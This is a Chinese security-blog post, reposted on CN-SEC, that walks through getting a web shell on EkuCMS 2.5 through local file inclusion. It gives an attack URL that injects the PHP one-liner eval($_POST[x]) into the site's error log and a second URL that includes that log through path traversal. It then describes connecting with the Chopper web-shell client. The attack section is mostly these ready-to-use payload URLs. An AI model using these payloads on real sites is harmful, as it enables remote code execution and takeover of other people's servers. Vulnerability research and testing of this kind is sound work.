欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全博客颓废's Blog正文

易酷cms本地包含漏洞拿shell

2019年5月19日06:53:49评论1,157 views字数 212阅读0分42秒阅读模式

摘要

包含一句话：http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])} 会在网站的/temp/Logs/目录下生成一个错误日志，命名规则为年_月_日

测试版本：易酷cms2.5

包含一句话：http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

易酷cms本地包含漏洞拿shell

会在网站的/temp/Logs/目录下生成一个错误日志，命名规则为年_月_日

易酷cms本地包含漏洞拿shell

错误日志内容

易酷cms本地包含漏洞拿shell

包含错误日志，地址：http://localhost/ekucms2.5/?s=my/show/id//../temp/logs/17_12_02.log

易酷cms本地包含漏洞拿shell

直接用菜刀连接

易酷cms本地包含漏洞拿shell

成功

易酷cms本地包含漏洞拿shell

查看原文

https://cn-sec.com/archives/67543.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

http
日志
localhost

linux sudo root 权限绕过漏洞(CVE-2019-14287)

vBulletin远程代码执行漏洞（CVE-2019-16759）

mintinstall 7.9.9-代码执行(CVE-2019-17080)

Webmin远程代码执行漏洞【CVE-2019-15107】

PDF窃取Windows NTLM哈希值

骚姿势之shell32.dll执行getpass

Windows Server 2019开启远程桌面

Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc

metasploit创建反向shell并访问Windows 10系统环境

本文由颓废发表于 2019年5月19日06:53:49
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
易酷cms本地包含漏洞拿shellhttps://cn-sec.com/archives/67543.html

基于dedecms网站的一次渗透

XiaoCms最新后台拿shell

chaos：一款整合了ChatGPT的源IP扫描工具

0xsp Mongoose：权限提升枚举工具包，使用Web API快速智能枚举

Ubuntu下Apache开启vhost多站点

【eBPF攻防】隐匿后渗透容器Nysm浅浅析

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

本类热门文章

Windows Server 2019开启远程桌面 7,802 views 0
sqlmap修改最大线程数，效率爆表 5,352 views 2
phpmywindV5.3最新漏洞合集（前台sql注入及后台任意文件遍历） 5,019 views 0
利用PHPstudy探针弱口令漏洞批量拿shell 4,678 views 0
ＳＳＨ爆破字典 4,561 views 0
ThinkPHP V5.x 远程代码执行漏洞利用（附POC） 4,455 views 0
wooyun乌云公开漏洞、乌云知识库爬虫和搜索乌云镜像最新版(总结) 4,176 views 0

颓废's Blog

linux sudo root 权限绕过漏洞(CVE-2019-14287) 11/21 976 views
vBulletin远程代码执行漏洞（CVE-2019-16759） 11/21 1,390 views
mintinstall 7.9.9-代码执行(CVE-2019-17080) 11/21 887 views
Webmin远程代码执行漏洞【CVE-2019-15107】 11/21 700 views
PDF窃取Windows NTLM哈希值 11/21 682 views
骚姿势之shell32.dll执行getpass 11/21 1,024 views
Windows Server 2019开启远程桌面 11/21 7,802 views
Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725) 11/21 2,006 views
CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc 11/21 1,605 views
metasploit创建反向shell并访问Windows 10系统环境 11/21 787 views

热门标签

黑客 com 漏洞信息安全 php 恶意软件文件未分类数据安全 cve 服务器 python cwe 工具网络安全 apache 漏洞预警 ctf app 渗透测试攻击者网络攻击 java linux 公众号 shellcode 攻击 web android 漏洞复现 ip 安全 rce microsoft 代码 xss 密码 github 应用程序勒索软件 sql payload 用户远程代码执行漏洞 shell windows 网络 http https 身份验证

最新文章

逆向分析工具GHIDRA 04/25 2 views
微软发现 GooseEgg 恶意软件 04/25 2 views
Python语法简要介绍 04/25 1 views
基于Django+Celery+AWVS的漏洞扫描器WEBSCANNER 04/25 0 views
PHP反序列化代码审计|由浅入深 04/25 2 views
两年前的NET通用系统代码审计 04/25 1 views
【BlackHat 2024】SystemUI As EvilPiP: 针对现代移动设备的劫持攻击 04/25 3 views

大家喜欢

669个大学网站都有注入点 4305/01
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17
Android逆向练习1 跳过签名验证 901/18

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章104857 留言 544 访客17271481

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章104857
分类47
标签114638
留言544
链接0
浏览17271481
今日8
本周776
运行2949 天
更新2024-4-25

Copyright © CN-SEC中文网版权所有.

微信

在线工具
娱乐一下
在线工具集
DNSlog

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

8888